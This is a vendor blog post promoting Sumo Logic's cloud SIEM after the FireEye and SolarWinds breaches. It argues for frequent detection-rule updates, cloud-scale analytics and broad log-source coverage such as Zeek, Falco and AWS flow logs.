In the wake of the widely publicized FireEye breach and the alarming SolarWinds supply chain attack, this presents an ideal opportunity for reflection on the broader shift taking place across the world—the transition from legacy on-prem infrastructures to the cloud. When a sophisticated nation-state obtains utilities intended for Red Team activities-- all but assuring nefarious intent-- it should give our community pause as to the collective state of security readiness should an attacker leverage such tools.
So what does a modern security analytics platform provide that can help defend critical assets in this continuously evolving threat landscape? As it relates to your SIEM platform, improving your organization’s security posture is a complex issue that can be deconstructed into a few different focus areas we’ll call: Velocity, Visibility, and Vector.
The reality on the frontlines is, SecOps and security analysts simply do not have time to track all of the evolving threats to an organization's critical assets. Technology stacks being deployed are expanding with more niche and cross-vendor solutions that it becomes difficult to know which vulnerabilities in the latest headlines are relevant and what priority they should take. Further, deploying patches and content packs with new detection rules, signatures require many operational man-hours. Fortunately, cloud-native SaaS solutions are providing much-needed relief. Solutions like Sumo Logic’s Cloud SIEM Enterprise release new actionable content in the form of correlation rules to the customer environment several times a week on average. That means, as we discover new threats, we can globally deploy content to all customer environments equipping them to automatically detect the threats. Additionally, writing SIEM correlation rules requires specialized skill, because Sumo Logic supports community standards like Sigma and YARA rules, customers can also find and import rules already developed by industry experts. As defenders, it is critical we share intelligence and content freely because if we don’t, the adversary will always be one step ahead. In short, evaluate your current solution and consider:
- How updates are actively applied?
- At what regular cadence?
- What support the solution has for community-contributed content?
Professor Patrick Wolf accurately stated “the rate at which we're generating data is rapidly outpacing our ability to analyze it. The trick is to turn these massive data streams from a liability into a strength.” Now that log analytics and security solutions have shifted to the cloud, organizations can finally keep pace with the rapid growth of machine data being generated. Furthermore, they’re now able to scale elastically–not only with collection–but with the compute power required to make sense of the data. For example (as of October 2020) Sumo Logic analyzes 1.6 quadrillion events and built a cloud-scale analytics platform that scans an average of 873 petabytes of data -- every day. All of this is accomplished without the deployment of any legacy on-prem hardware or infrastructure. The ability to search and visualize across such massive amounts of data has been a game changer for organizations. Taken to the next level, we can provide additional global intelligence insights across all our customers' data, allowing them to compare security attacks against their enterprise with the cyber landscape at large. This invaluable perspective would not be possible without a modern microservices-based, cloud-native architecture.
The last area to consider is the attack vectors being leveraged, and are signals being collected sufficiently to identify cyber events across all areas of IT infrastructure? Specifically, as organizations move from on-prem to hybrid cloud and then to multi-cloud, is the security team able to defend all of these beachheads? For example, does the solution provide out-of-the-box content for traditional Windows infrastructure, as well as Azure, AWS, and GCP? Does it allow for deeper inspection of both North-South and East-West traffic flowing between systems with open-source network analytics solutions like Bro/Zeek? Solely relying on firewall logs for network visibility can leave critical blind spots. At a bare minimum, support for newer data sources like Zeek, Kubernetes+Falco, AWS VPC flow logs, and AWS Network Firewall are a must-have. Combined, these also bring new observability that helps modern security practitioners find the needle in the needles stack before a breach occurs.
If you're looking to modernize your security stack for greater visibility and reduce your time to detection and response, we’d love to share with you how Sumo can help with your security team’s digital transformation.
Complete visibility for DevSecOps
Reduce downtime and move from reactive to proactive monitoring.